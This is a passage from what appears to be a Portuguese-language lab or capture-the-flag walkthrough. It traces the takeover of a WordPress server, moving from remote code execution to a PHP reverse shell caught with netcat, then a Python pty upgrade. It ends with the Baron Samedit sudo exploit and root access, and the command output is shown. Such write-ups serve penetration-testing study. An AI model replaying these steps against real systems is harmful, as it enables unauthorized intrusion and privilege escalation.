Basta seguir o passo a passo sugerido no link, criar um arquivo chamado payload.txt com seu código malicioso, e depois rodar na URL para checar o retorno. Vejamos um exemplo rodando o comando "lsb_release -a"
Pronto, temos aqui um RCE para explorar. Basta usar a criatividade para conseguir uma shell remota.
Exploração
Vamos criar então um arquivo chamado payload.txt com o seguinte conteúdo (não esqueça de adequar seu IP. Ele ser para gerar uma shell reverso em PHP.
Agora basta executar a url no browser e esperar fechar a shell no linux:
# nc -nlvp 4444
listening on [any] 4444 ...
connect to [172.29.34.50] from (UNKNOWN) [10.0.0.23] 41772
bash: cannot set terminal process group (1084): Inappropriate ioctl for device
bash: no job control in this shell
www-data@socialshare:/var/www/html/wordpress/wp-admin$
Pós Exploração
Vamos rodar os comandos para checar as versões de Linux e Kernel do servidor:
$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04 LTS
Release: 20.04
Codename: focal
$ uname -a
uname -a
Linux socialshare.hs.local 5.4.0-53-generic #59-Ubuntu SMP Wed Oct 21 09:38:44 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Temos aqui um ubuntu 20 com kernel 5.4.Jà sabemos que este cenário é vulnerável ao exploit Sarom Samedit (referente a versão vulnerável do sudo 1.8)
Vamos melhorar a shell via python:
$ python3 -c "import pty; pty.spawn(\"/bin/sh\")"
Agora basta transferir os scripts python para o servidor alvo e rodar o script para escalar os privilégios:
$ python exploit_nss.py
python exploit_nss.py
/bin/sh: 3: python: not found
$ python3 exploit_nss.py
python3 exploit_nss.py
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)